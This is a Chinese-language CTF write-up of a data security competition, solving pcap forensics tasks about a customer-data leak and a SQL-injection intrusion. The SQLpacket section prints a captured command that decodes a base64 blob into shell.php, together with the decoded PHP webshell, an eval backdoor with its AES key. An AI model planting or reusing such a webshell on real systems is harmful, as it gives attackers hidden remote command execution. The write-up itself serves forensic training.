i春秋首届全国数据安全大赛部分复盘
2022-10-27 12:41:0 Author: 每天一个入狱小技巧(查看原文) 阅读量:205 收藏

2022年10月25日,为期两日的数据安全大赛于i春秋平台线上举行,在王队长的领队下,团队三个屁民开始了有趣的解题之旅。

题目分为四个类型,分别是“安全知识”、“数据分析”、“数据算法”、以及数据安全。
时间有点短,再加上有里还有活要干,所以很多题也没有答完,这次由我代表大家给大家进行一个复盘

0x01 泄露溯源定位

这个其实是正式答题的第一题,理论题在这里就不赘述了。我们来看下题干和描述。

题干如下:

我们可以得知,此次泄密事件,泄密的主体其实是五个人的姓名、手机号信息,当然了还有其他的一些信息,不过那个是后面的题,我们先看第一题,通过公示的五条信息,而后回放pcap包来找到究竟是哪个账户泄密的。

我们如题,使用wireshark打开数据包就可以了,而后直接筛选mysql协议、检索关键字为 Roberto Qian,至于为什么不检索汉字,因为我嫌转化为十六进制麻烦

实际上符合检索的也没几个,很快我们就检索到了符合要求的数据包

tcp.stream eq 11

我们可以发现,上述的5个电话号码完全符合泄密的信息,那么就可以证明就是这个数据包有问题,并且也可以看到,当前数据库的用户为 dataUser3

第一题也就解答好了,我们接下来看第二题

去github直接搜索关键字就可以找到项目了,很简单,考的是信息收集能力

https://github.com/Tristan-Hao/Green-Berry/blob/f766064e4f9c38bf4aefa06fd3d4abbda7fe4914/catalogue.py

那么我们再看最后一道小题

这里说明,泄露的不仅仅是姓名、手机号,我们直接返回刚刚我们截取的流量包,流量包关键信息如下

def.ob.dcf_customer.dcf_customer.address.address.!.,.........+....1  ..........13345678879...................(....2........13573839493...................#....3.Roberto Qian.15877886543.Beijing*..  .4.Liu Xiao.13098887678.......................5........18798766766.............."...$......select * from dcf_encryption_info.....B....def.ob.dcf_encryption_info.dcf_encryption_info.id.id.?.....#B...F....def.ob.dcf_encryption_info.dcf_encryption_info.type.type.!...........D....def.ob.dcf_encryption_info.dcf_encryption_info.key.key.!...............1.Base64......2.MD5.....3.SHA1.go321.....4.AES.aa01...  .5.AES.sin30......"..."......select * from dcf_receive_info3.....>....def.ob.dcf_receive_info3.dcf_receive_info3.id.id.?.....#B...N....def.ob.dcf_receive_info3.dcf_receive_info3account_idaccount_id.?...........B....def.ob.dcf_receive_info3.dcf_receive_info3.info.info.!...........a....1.10021XU2FsdGVkX18ONrEC8DOa5sxdTazAeWPXK8OP/885ZQJWJf6P4RsZUfl8o1VOczurimp/uoUa4NuWVb7f7yTcRw==.....2.10024.U2FsdGVkX18DnWH7nMCG3lVMd8GtLTXeuwEl7xgojnkN2Ovsm0rXzNqLEI0RSnwPYN+/p9BG4ODOr4Iwczj2A3nMwuZkzzTE8z88f/6gGzjhhbdA52JK3f1pivFbnSt+u....3.10022lU2FsdGVkX1+/NGJAqRBlFe+GyjneDvQ8ncbqP+ra5DXk1XGLuGXMbf7TLC5NSScurrJuB2mOxXHJh0yeNiW3vXC+/iKbXQoQhphVQJkUiX0=u....4.11021lU2FsdGVkX18X1/E8qwRNMB9ON1Z+fKLmmkhuVa0EoCRSnppuybeWlcho8XWURJhD0hS1TqBLLH/gAW3lqAGO5BTn9vjUCEQiY7ydcWGPBSs=...  .5.15021.U2FsdGVkX19Gqh30S0qbTTKMw+mXBg2H+FsngqcZNr+KmWQnpVNLDtpPqt5eX7/hFEIbGXxOrJ9VUX3tBJZkR0RYL+TQHV6QHoYvQweOFLRY/PcpP5D2NoqZMLT6hwrzu...6.15021lU2FsdGVkX1+bn0csCcNtspL662QhJQI/NEsj8fWWyIBU0GVXvvc/ygymTqH3x8LFcyvPV4YE7OtxkRXOS90Ox49TI/StAcIdnQBletRVA2g=a....7.15021XU2FsdGVkX1+2aHxIB+0HcAPn7x370Dv5RxN2LSlrmkqbNa8bpEfapNqyxWXFWtJvS3d6vfVNpgN6pFzpnDiELA==a....8.11021XU2FsdGVkX18Oj2t+msNrJ7T0sXpcrW0Usy1yqQYRoJF1JQwnD/thdJpPKZ1xTVtrgo8y6LQn5yMMzf6nR6vNiw==a...9.15022XU2FsdGVkX1+93npTkiALajdkWz5i4ccX2nV0mRQGfKQUcEOo0YpGBKSm21ayhT0wq7t7vypmpqqLemWjQN5z4Q==b....10.16025XU2FsdGVkX19uDaaDF/0X1yvPtZHqG1jG2Fw0bDQM+jqLoN19RE5MOdiQNVI0k150G+ZB3Ow+8pDvwIw9hdT8wQ==b....11.15028XU2FsdGVkX1/GrEF+qSfy8Fq+w8O0t7ABU1OqzrCoCFo+i42H03T9q2EjSKkSGSPh3gDfBHfamAJwf1OR0WprGw==b....12.15026XU2FsdGVkX19AUOJfLgsTjgV5N/ywPP0vvv52ph[email protected]U2FsdGVkX19V7mz6otuRIdXKP/[email protected]Jj[email protected]U2FsdGVkX18li8mlOIWPfxl331OPPIE64pywNqWvq88P0ZJSU7WMO2ZyDNxxD/[email protected]Mtw1kGaJ2zMx7MDl......."........


我们可以发现,下面有16条加密流量,然后在上半部分有5个编码的提示,我们直接根据提示进行解密,发现其实使用的就是aes加密,秘钥就是aa01

解密后如下
http://www.jsons.cn/aesencrypt/

0x02 SQLpacket

第一题,我们可以发现,根据pcap包前面的操作都是sql注入的探测,直到后面进行了命令执行,根据检索,发现攻击者执行了ls命令,并且数据包出现了我们想要的东西

后来发现,可以直接检索关键字
tcp.stream eq 185

第二题,是寻找加密的东西,团队搞半天没找到,后来发现没找到的原因是人家就是base64加密然后转hex了,并没有使用冰蝎aes加密,这就很迷,也是困扰我们团队的一个问题,为什么请求体是aes+base64加密,单单这个返回包却是base64+hex编码???

我们通过翻垃圾,找到了冰蝎加密的过程
tcp.stream eq 187

加密主体为base64编码

/tmpbkxya.php?cmd=echo%20PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iMDVjMWNjOWMyZGVhZmI3NSI7CgkkX1NFU1NJT05bJ2snXT0ka2V5OwoJc2Vzc2lvbl93cml0ZV9jbG9zZSgpOwoJJHBvc3Q9ZmlsZV9nZXRfY29udGVudHMoInBocDovL2lucHV0Iik7CglpZighZXh0ZW5zaW9uX2xvYWRlZCgnb3BlbnNzbCcpKQoJewoJCSR0PSJiYXNlNjRfIi4iZGVjb2RlIjsKCQkkcG9zdD0kdCgkcG9zdC4iIik7CgkJZm9yKCRpPTA7JGk8c3RybGVuKCRwb3N0KTskaSsrKSB7CiAgICAJCQkgJHBvc3RbJGldID0gJHBvc3RbJGldXiRrZXlbJGkrMSYxNV07IAogICAgCQkJfQoJfQoJZWxzZQoJewoJCSRwb3N0PW9wZW5zc2xfZGVjcnlwdCgkcG9zdCwgIkFFUzEyOCIsICRrZXkpOwoJfQogICAgJGFycj1leHBsb2RlKCd8JywkcG9zdCk7CiAgICAkZnVuYz0kYXJyWzBdOwogICAgJHBhcmFtcz0kYXJyWzFdOwoJY2xhc3MgQ3twdWJsaWMgZnVuY3Rpb24gX19pbnZva2UoJHApIHtldmFsKCRwLiIiKTt9fQogICAgQGNhbGxfdXNlcl9mdW5jKG5ldyBDKCksJHBhcmFtcyk7Cj8%2B%20%7Cbase64%20-d%20%3E%20shell.php

解密如下:

<?php@error_reporting(0);session_start();    $key="05c1cc9c2deafb75";    $_SESSION['k']=$key;    session_write_close();    $post=file_get_contents("php://input");    if(!extension_loaded('openssl'))    {        $t="base64_"."decode";        $post=$t($post."");        for($i=0;$i<strlen($post);$i++) {                 $post[$i] = $post[$i]^$key[$i+1&15];                }    }    else    {        $post=openssl_decrypt($post, "AES128", $key);    }    $arr=explode('|',$post);    $func=$arr[0];    $params=$arr[1];    class C{public function __invoke($p) {eval($p."");}}    @call_user_func(new C(),$params);?>

我们在这里获取到了加密的秘钥

$key="05c1cc9c2deafb75";

然后依然是翻垃圾,在某请求中我们发现了下载流量

tcp.stream eq 197

原始请求体:

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